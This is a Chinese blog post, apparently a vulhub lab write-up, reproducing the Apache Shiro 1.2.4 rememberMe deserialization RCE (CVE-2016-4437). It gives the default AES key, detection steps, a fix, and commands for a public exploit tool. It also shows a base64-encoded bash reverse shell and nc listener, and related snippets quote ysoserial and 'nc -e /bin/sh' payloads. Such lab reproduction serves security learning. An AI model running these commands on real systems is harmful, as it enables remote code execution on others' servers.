vulhub-Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )

已于 2023-09-16 16:16:52 修改
阅读量182 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: apache
于 2023-09-16 16:09:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58265086/article/details/132919991
本文详细介绍了ApacheShiro1.2.4版本的反序列化漏洞原理,如何利用AES密钥进行攻击,防御方法以及漏洞验证步骤,同时提供工具和解决方案以检测和利用此漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )

漏洞链接

https://vulhub.org/#/environments/shiro/CVE-2016-4437/

漏洞影响

Shiro <= 1.2.5

漏洞原理

Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>base64编码=>RememberMe Cookie值。如果用户勾选记住密码,那么在请求中会携带cookie,并且将加密信息存放在cookie的rememberMe字段里面,在服务端收到请求对rememberMe值,先base64解码然后AES解密再反序列化,这个加密过程如果我们知道AES加密的密钥,那么我们把用户信息替换成恶意命令,就导致了反序列化RCE漏洞。在shiro版本<=1.2.4中使用了默认密钥kPH+bIxk5D2deZiIxcaaaA==,这就更容易触发RCE漏洞。

漏洞防御

shiro更新到1.7及以上

漏洞验证

1.未登录的情况下,请求包的cookie中没有rememberMe字段,返回包set-Cookie里也没有deleteMe字段

image-20230915212636295

2.登录失败的话,不管有没有勾选RememberMe字段,返回包都会有 rememberMe= deleteMe 字段

image-20230915212723898

3.不勾选RememberMe,登录成功的话,返回包set-Cookie里有rememberMe=deleteMe字段。但是之后的所有请求中Cookie都不会有RememberMe字段

image-20230915213203910

4.勾选RememberMe,登录成功的话,返回包set-Cookie里有rememberMe=deleteMe字段,还会有remember 字段,之后的所有请求中Cookie都会有rememberMe字段

image-20230915213358233

5.或者可以在cookie后面自己加一个rememberMe=1,看返回包有没有rememberMe= deleteMe

image-20230915213646203

漏洞启动

sudo docker-compose up -d

image-20230915211424037

登录画面

image-20230915211812453

使用工具对漏洞进行破解

https://github.com/insightglacier/Shiro_exploit //工具地址

使用工具进行破解

sudo python3 shiro_exploit.py -u url:port

image-20230916153038633

使用工具出现错误

NO module named 'Crypto'

image-20230916153106863

解决错误

image-20230916153402998

image-20230916153517062

pip uninstall crypto pycryptodome
pip install pycryptodome
//:python安装目录下的\Lib\site-packages,将crypto文件夹的名字改成Crypto。

重新执行命令

sudo python3 shiro_exploit.py -u url:port

image-20230916153606300

vulnerable:True url:http://10.9.75.11:8080 //出现这个就说明就shiro漏洞

image-20230916153700933

使用反弹sheel

## 对反弹shell命令进行加密并利用

1:bash -i >& /dev/tcp/10.9.75.11/7777 0>&1

2:base 64加密

3:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjExLzc3NzcgMD4mMQ}|{base64,-d}|{bash,-i}

然后将其编入工具,实现最终反弹

python3 shiro_exploit.py -t 3 -u http://10.9.75.11:8080 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjExLzc3NzcgMD4mMQ}|{base64,-d}|{bash,-i}"

image-20230916155259747

nc -lnvp 7777 //打开监听

image-20230916155424579
本文工具使用:参考1
其他工具使用:参考2

Apache Shiro 1.2.4反序列化漏洞(Shiro-550)--Shiro rememberMe反序列化漏洞(CVE-2016-4437)
薛定谔嘚喵博客
05-10 2033
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437) 复现
yukinorong的博客
06-29 3418
基础知识 序列化和反序列化 反序列化漏洞原因 在Java反序列化中,会调用被反序列化的readObject方法,当readObject方法书写不当时就会引发漏洞反序列化的检测 基础库中隐藏的反序列化漏洞 优秀的Java开发人员一般会按照安全编程规范进行编程,很大程度上减少了反序列化漏洞的产生。并且一些成熟的Java框架比如Spring MVC、Struts2等,都有相应的防范反序列化的机制。如果仅仅是开发失误,可能很少会产生反序列化漏洞,即使产生,其绕过方法、利用方式也较为复杂。但
vulhub漏洞复现 Apache Shiro 1.2.4反序列化漏洞 Apache Shiro 认证绕过漏洞
记录笔记
04-13 1518
vulhub漏洞复现 Apache Shiro 1.2.4反序列化漏洞 Apache Shiro 认证绕过漏洞 shiro反序列化漏洞有何特征?如何防御shiro反序列化漏洞 Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie,在服务端接收cookie值后,Base64解码–>AES解密–>反序列化。攻击者只要找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化–>AES加密–>Base64
vulhub漏洞复现 Apache Shiro 1.2.4反序列化漏洞
m0_56135391的博客
04-16 3042
使用docker -compose up -d拉取环境 本地访问8080端口进行验证,创建成功 使用shiro反序列化漏洞利用工具进行漏洞利用,输入目标网址,点击下一步 选择使用ceye.lo进行漏洞检测 当命令可输入的时候,证明含有该漏洞 在命令行中输入id,显示命令执行成功,但无回显 输入命令touch test创建一个文件 在网站目录下查看,该文件创建成功 打开虚拟机Kali系统,输入命令 nc -nvlp 6666监听6666端口 在shiro反序列化利用工具中选择简便操作,反
shiro反序列化漏洞(CVE-2016-4437)漏洞复现
HEAVEN569的博客
06-21 7230
本文对shiro反序列化漏洞(CVE-2016-4437),进行了分析复现,介绍了利用工具和常规修复方法
[CVE-2016-4437] Apache Shiro 安全框架反序列化漏洞复现与原理详细分析
Specif1c的博客
10-21 5550
Apache Shiro是一个强大且易用的 Java安全框架,执行身份验证、授权、密码和会话管理。shiro 相比于 springsecurity 简单许多,官方号称 10 分钟就能学会。shiro 反序列化漏洞是 Java 经典漏洞,于2016年被挖掘出来,到现在依旧很多系统存在该漏洞,非常值得学习,对加深 shiro 认证机制的理解以及java代码审计颇有帮助。
Weblogic XMLDecoder 反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
05-20 3686
本文介绍了Weblogic XMLDecoder反序列化相关的漏洞原理和poc的构造,并以CVE-2017-10271为例在vulhub上进行了复现。有关Weblogic XMLDecoder反序列化漏洞包括CVE-2017-3506、CVE-2017-10271CVE-2019-2725、CVE-2019-2729等,其漏洞原理相似,本文对此进行了简要介绍。
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
然而,在Apache Shiro 1.2.4及其更早的版本中,存在一个严重的反序列化漏洞。这个漏洞主要与RememberMe服务的实现有关。在处理RememberMe的Cookie时,Shiro的`CookieRememberMeManager`类会执行一系列操作:首先,它...
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 3040
CVE-2016-4437 Shiro反序列化漏洞复现
Apache Shiro 1.2.4反序列化漏洞
m0_53603468的博客
12-22 334
第二天总结 概述 今天我们复现了Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437)这一漏洞Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 之后去了解了什么是序列
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550) commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989' nc -nlvp 8989 python用法: python3 shiro_rce.py _____ _ _ _____ _____ ____ _____ _____ __
shiro安全框架的2CVE漏洞复现
tpaer的博客
09-25 1261
shiroapache下的一个java安全框架,通常用来进行授权和认证,相比于同样流行的spring security框架,shiro更加轻量更好上手使用的人也更多。此文复现环境为vulhub靶场,以下将复现靶场中的两个shiroCVE漏洞
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
人若无名,便可专心练剑
03-27 5666
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
Shiro-CVE-2016-4437 漏洞复现(vulhub靶场搭建)
zzxyccxc的博客
09-12 1429
Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>base64编码=>RememberMe Cookie值。
vulhubshiro
最新发布
追风少年亚索的博客
11-17 1059
免责声明: 本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。
Vulhub成长记录Day2】复现ActiveMQ反序列化漏洞+jmeter安装
qq_53970087的博客
08-06 1268
全过程超详细打通vulhub第一个漏洞:activemq
Vulhub靶场-phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)
Grace_for_it的博客
05-03 738
vulhub靶场复现 php源码 bp抓包 网络安全 渗透测试
vulhubshiro反序列化漏洞工具复现(CVE-2016-4437
qq_45300786的博客
04-22 1217
详细过程可以看我的这篇文章 Apache Shiro Java反序列化漏洞 这次我就直接用工作来复现 工具地址https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/tag/v2.3 shiro的端口是8080 默认 然后等一会,解密 监听端口 然后反弹shell 反弹成功 参考文章 https://vlambda.com/wz_7iadhz3GfNo.html ...
vulhub漏洞复现-Apache Shiro(CVE-2016-4437) 反序列化漏洞复现
遇事不决冲冲冲
10-22 3741
Apache Shiro Apache Shiro是一个强大且易用的Java安全框架,用来执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。 思路 Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行序列化、AES加密、Base64编码操作。在识别身份的时候,
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值